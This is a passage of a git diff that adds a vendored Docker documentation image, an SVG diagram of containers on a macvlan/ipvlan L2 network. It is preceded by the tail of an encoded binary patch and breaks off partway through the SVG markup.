zyu=4@-LoVG0@;)UtlWab>Ouxtb+)##;ij4SwWJvpQF5c#X6X^EvXwn1#}Ki0-R-0D
zC;$_4aqjQqjG$>p&mOzWK`xa1m|+sJSf4K|<(<q-r4>f3PWta)P%=9SbQwF;u2rq7
zAbx+Q{KKP}X*IO99wIEIE0cnMwgpk`cCS)A#t&-5n9^mOSK{^5kEPU+pwUorG+n8i
zEDr*KIbiMJ*C4d5hy53%nNhC^W#}H)y#ZVR)M9ai2J8JDlfO1)6Pwa%Na=l>jPR~D
zWN{*vLsbbD4dTsfEGmV3M#B#Le1IOYXL(x2!24ah0wi4l$dMH)e}51&`xQ%(_tfh&
z=hfPOrYt*i3XBZ6$8E7dd2HSIomjl@)@s~qgc~P_p1m6jVG|?bj=5*%X#IL67V*O9
zVZsCxlu+AjnRg8nO%no#Y7K9lPK%Xmaq_I2LwBS-nZ{XNYIb$~7-}Zi$F3v0Xk&Za
z8?p}5XBw;Fe@wwB7%CY=6C~Kzv%|p9#5S{9OQ9irqHWy`h{?pnMC{x_6Dn8lKCU)o
z2^89UU)i2LnMV3tE<ZS9a<uQu7K(ShNifpAT?H)F`d3SGYLrS@+w!m&6RIYUBW?SR
z>_qNa)4O&Gf1c}K`=M)9HK?SCq!?=iR%cUcsuf2ijz`^(uDkDNi?s-lBIv@iG01iz
zm7=VyiKc`~djzZ<)D!kSKu&JVd23;0IaEf88fYH$&<6rML5|+!-z4p>1w&UPVQ;|k
zs@J0zQ=a9#Mg7q;>{{txEtygSrz<trC$+~WrBR8$mzV5+<mRKwi(KfA-}2GD!~EwT
cTK|R~xYw@a%hL$)?SGQAgo1dLs8Qhm0&7~1d;kCd

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg
new file mode 100644
index 0000000000..757871e3d4
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg
@@ -0,0 +1 @@
+<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="561" height="354.5"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs/><g transform="translate(0,0)"><g><rect fill="#FFFFFF" stroke="none" x="0" y="0" width="561" height="354.5"/></g><g transform="translate(0,0) matrix(1,0,0,1,8,177)"><g><g transform="translate(0,0) scale(2.52,1.29)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.3968253968253968,0.7751937984496123)"><path fill="#c5e4fc" stroke="none" d="M 10 0 L 242 0 Q 252 0 252 10 L 252 119 Q 252 129 242 129 L 10 129 Q 0 129 0 119 L 0 10 Q 0 0 10 0 Z" opacity="0.93"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 242 0 Q 252 0 252 10 L 252 119 Q 252 129 242 129 L 10 129 Q 0 129 0 119 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" stroke-width="2" opacity="0.93"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,16,240)"><g transform="translate(4,4) scale(1.0045045045045045,1.0087719298245614)"><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#000000" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.73"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.73"/></g></g></g></g></g><g transform="matrix(1,0,0,1,26,246)"><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="45" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="75" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="75" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="9" y="13">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="65" y="13"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="76" y="13">1</text></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="15" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="15" width="26" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="15" width="26" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="33" y="28">eth0</text></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="30" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="30" width="88" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="30" width="88" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="2" y="43">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="24" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="43">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="42" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="46" y="43">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="53" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="57" y="43">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="71" y="43">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="75" y="43">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,138,240)"><g transform="translate(4,4) scale(1.0045045045045045,1.0087719298245614)"><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#000000" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.73"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.73"/></g></g></g></g></g><g transform="matrix(1,0,0,1,148,247)"><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="44" fill-opacity="0"/></g></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="14" fill-opacity="0"/></g></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="0" width="70" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="11" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="12"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="73" y="12">2</text></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="92" height="30" fill-opacity="0"/></g></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="87" height="30" fill-opacity="0"/></g></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="87" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="33" y="27">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="3" y="42">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="25" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="42">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="43" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="46" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="53" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="57" y="42">11</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="71" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="74" y="42">24</text></g></g><g transform="matrix(1,0,0,1,152.86753236814712,193.5)"><g transform="translate(0,0)"><g transform="translate(-40,26.067047119140625) translate(-112.86753236814712,-219.56704711914062) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 193.5 240 L 157.36753236814712 198" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,67,193.49999999999997)"><g transform="translate(0,0)"><g transform="translate(-50,16.067047119140625) translate(-17,-209.5670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 71.5 240 L 112.63246763185288 197.99999999999997" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,130.5,79.5019243141968)"><g transform="translate(0,0)"><g transform="translate(-60,6.067047119140625) translate(-70.5,-85.56897143333742) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 135 174 L 275.32345076546227 84.0019243141968" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,5,185)"><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="76" height="32" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="76" height="16" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="0" width="46" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="16" y="14">Docker</text></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="76" height="16" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="16" width="50" height="14" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="16" width="50" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="14" y="30">Host</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="43" y="30"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="54" y="30">1</text></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="62" y="18" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="1" height="14" fill-opacity="0"/></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,283,177)"><g><g transform="translate(0,0) scale(2.52,1.29)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.3968253968253968,0.7751937984496123)"><path fill="#c5e4fc" stroke="none" d="M 10 0 L 242 0 Q 252 0 252 10 L 252 119 Q 252 129 242 129 L 10 129 Q 0 129 0 119 L 0 10 Q 0 0 10 0 Z" opacity="0.93"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 242 0 Q 252 0 252 10 L 252 119 Q 252 129 242 129 L 10 129 Q 0 129 0 119 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" stroke-width="2" opacity="0.93"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,291,240)"><g transform="translate(4,4) scale(1.0045045045045045,1.0087719298245614)"><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#000000" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.73"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.73"/></g></g></g></g></g><g transform="matrix(1,0,0,1,301,246)"><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="45" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="75" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="75" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="9" y="13">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="65" y="13"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="76" y="13">3</text></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="15" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="15" width="26" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="15" width="26" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="33" y="28">eth0</text></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="30" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="30" width="88" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="30" width="88" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="2" y="43">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="24" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="43">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="42" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="46" y="43">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="53" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="57" y="43">12</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="71" y="43">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="75" y="43">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,413,240)"><g transform="translate(4,4) scale(1.0045045045045045,1.0087719298245614)"><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#000000" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.73"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.73"/></g></g></g></g></g><g transform="matrix(1,0,0,1,423,247)"><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="44" fill-opacity="0"/></g></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="14" fill-opacity="0"/></g></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="0" width="70" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="11" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="12"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="73" y="12">4</text></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="92" height="30" fill-opacity="0"/></g></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="88" height="30" fill-opacity="0"/></g></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="88" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="33" y="27">eth0</text></g><g transform="translate(79,71) matrix(1,0,0,1,0,0) translate(-79,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="29" width="88" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="2" y="42">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" 